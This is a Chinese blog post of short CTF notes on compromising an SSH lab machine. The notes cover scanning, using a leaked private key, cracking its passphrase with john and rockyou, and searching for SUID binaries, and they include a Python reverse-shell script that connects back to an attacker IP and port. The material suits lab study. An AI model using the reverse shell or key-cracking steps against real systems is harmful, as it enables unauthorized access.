CTF-SSH

最新推荐文章于 2024-04-02 17:26:43 发布
最新推荐文章于 2024-04-02 17:26:43 发布
阅读量3.2k 收藏 2
点赞数
分类专栏: 网络安全 文章标签: ssh linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45778981/article/details/122399202
版权

CTF-SSH(笔记+总结)

思路:对网络进行扫描,寻找可疑主机,对目标主机进行端口扫描,特别注意大端口和特殊端口,在端口中寻找关键文件、可疑文件,注意id_rsa,远程登录目标主机,判断获取用户类型,进行提权最终获取root用户,获取flag。

netdiscover -r ip/netmask
nmap -sV ip
nmap -A -v ip
nmap -O ip
dirb http://ip:端口
nikto -host ip
ssh -i id_rsa 用户名@ip
chmod 600 id_rsa
python /usr/share/john/ssh2john.py id_rsa > rsacrack
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
find / -perm -4000 2>/dev/null
netstat -pantu
nc -lvp 4445
git clone https://github.com/jeanphorn/common-password.git
./cupp.py -i
python -c "import pty;pty.spawn('/bin/bash')"
 

反弹shell
靶场代码
#!/usr/bin/python
import os,subprocess,socket

s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("攻击机ip","攻击机监听端口"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])

攻击机netcat命令
	nc -lvp 未占用端口(要一致攻击机监听端口)
查看占用端口 netstat -pantu

在这里插入图片描述

小侯同学ing
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全CTF流量分析-入门5-SSH登录流量和Linux基本操作流量_ssh登录成功流量
m0_60750088的博客
04-29 239
答案是192.168.246.28。
CTF训练 ssh私钥泄露:如何从外部进去最终root主机,获取flag
weixin_44716769的博客
10-29 4330
CTF训练 ssh私钥泄露 CTF比赛中的两种环境 1.给予在同一局域网的攻击机和靶场机器,以web方式可以访问攻击机,通过攻击机来渗透靶场机器,获取对应的flag值;(一般情况下给于Kali Linux作为攻击机,并且举办方提供计算机)。 2.给予一个网线接口,用户自备工具,直接连接网线,进行渗透靶场机器,获取对应的flag值。 实验环境 1.Kali Linux:192.168.253.12 2.靶场机器:192.168.253.10 目的:获取靶场机器上的flag值 第一步:信息探测 对于只是给定一个
CTF训练 ssh服务渗透:如何从外部进入最终root主机,取得flag
weixin_44716769的博客
10-31 3892
CTF训练 ssh服务渗透 如何从外部进入最终root主机,取得flag SSH协议介绍 SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。 SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程中的信息泄露问题。 SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有
CTF-6.SSH服务渗透
woo233的博客
09-12 1257
SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程中的信息泄露问题。基于TCP 22号端口的服务。在对SSH服务渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。CTF中要特别注意。
网络攻防之ssh篇(穿插ctf的web例题)
qq_62097048的博客
07-08 1272
对于ssh进行的相关操作,有ctf的web例题
CTF-SSH服务渗透
最新发布
wangzhemvp的博客
04-02 877
在对SSH服务渗透中,大部分情况是利用获取的私钥文件(,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。CTF中 要特别注意 /tmp 数据缓冲目录 以及 /etc/crontab 设置定时执行的文件。
CTF训练之现学现卖--SSH私钥泄露-附件资源
03-02
CTF训练之现学现卖--SSH私钥泄露-附件资源
CTF-Writeups
05-16
CTF编写 该存储库是我为已解决的每个房间/机器编写的所有文章的集合。 文章和平台 Tryhackme 房间名称 难度级别 专注技能 :United_States: 难的 SSH隧道,SQL RCE,PATH变量Privesc Vulnhub 房间名称 难度级别 ...
Backdoor-CTF-Crypto-400.rar
09-30
"Backdoor-CTF-Crypto-400"可能是一个中级难度的题目,其难度级别为400,暗示着这可能是一个需要深入理解和应用密码学知识才能解决的问题。下面,我们将深入探讨可能涉及的密码学知识点。 1. **加密算法**:题目中...
Linux硬盘文件分析取证-ssh1.img 题目
03-28
在IT行业中,尤其是在网络安全与取证分析的领域,Linux硬盘文件分析取证是一项至关重要的技能。...通过对`ssh1.img`文件的深入研究,我们可以学习和提升这些技能,同时在CTF竞赛中锻炼我们的应变能力和问题解决能力。
CTF2-SSH服务渗透
weixin_52132147的博客
08-06 178
在对SSH服务渗透中,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。在CTF中要特别注意 /tmp 数据缓冲目录以及 /etc/crontab 设置定时执行的文件。
CTF综合靶机渗透
xv66666的博客
08-11 1029
虚拟机难度中等,使用ubuntu(32位),其他软件包有:PHPapacheMySQLBoot to root:从Web应用程序进入虚拟机,并获得root权限。靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。ip发现启动Billu_b0x虚拟机,由于虚机网络设置为
网络安全CTF流量分析-入门5-SSH登录流量和Linux基本操作流量
m0_51198141的博客
11-23 228
这道题还是比较简单的,只要熟悉基本的Linux命令和得到相应的结果就能根据题目找到答案,重点在于打开TCP流量观察,和对Linux系统的熟练度。欢迎师傅们交流沟通
CTF线下攻防赛总结
热门推荐
Sp4rkW的博客
10-01 3万+
原文链接:http://rcoil.me/2017/06/CTF%E7%BA%BF%E4%B8%8B%E8%B5%9B%E6%80%BB%E7%BB%93/ 作者:Rcoll 总结的非常好,转载收藏,感谢表哥的分享~ 一张常规的CTF线下攻防思维导图 SSH登陆 两三个人进行分工,一个粗略的看下web,有登陆口的话,就需要修改密码,将情况反馈给队友,让登陆ssh的小伙伴进行密码的修改...
CTF SSH服务root渗透
Kstheme的博客
08-15 2343
工具: kali linux ssh root渗透靶机 操作步骤: ssh协议介绍 SSH为Secure Shell的缩写,由IETF网络小组(Network Working Group)所指定;SSH为建立在应用层基础上的安全协议 SSH是目前较可靠,专为远程登录会话和其他网络提供安全性的协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题。 SSH最初是UNIX系统上的一个程序,后来又...
CTF-rootme 题解之SSH Agent Hijacking
weixin_30421809的博客
03-28 1540
LINK:https://www.root-me.org/en/Challenges/App-Script/SSH-Agent-Hijacking Referrence:https://www.cnblogs.com/mondol/p/6400699.html      https://github.com/Djazouli/RootMeHelp/blob/06d4ad358f43217...
ctf入门题之关卡一
笨蛋9的博客
02-18 6741
简介最近正好有台攻防平台的设备有些ctf的简单入门题,自己做了下,顺便写了些思路和过程和大家分享下,希望对新手有点帮助题目思路题目中有些提示:部分版本的Serv-U软件存在目录遍历、权限提升、匿名登录等漏洞,因此我们可以从题目中这些提示结合Ser-U软件的版本进行入手解题过程 发现直接匿名登录就能进去了,也不能cd到上级目录。但Serv-U版本是v10.5,这版本的Serv-U可能存在目录遍历漏洞
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。 一、Vulnhub简介 Vulnhub是一个开源的渗透测试平台,提供了多种类型的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值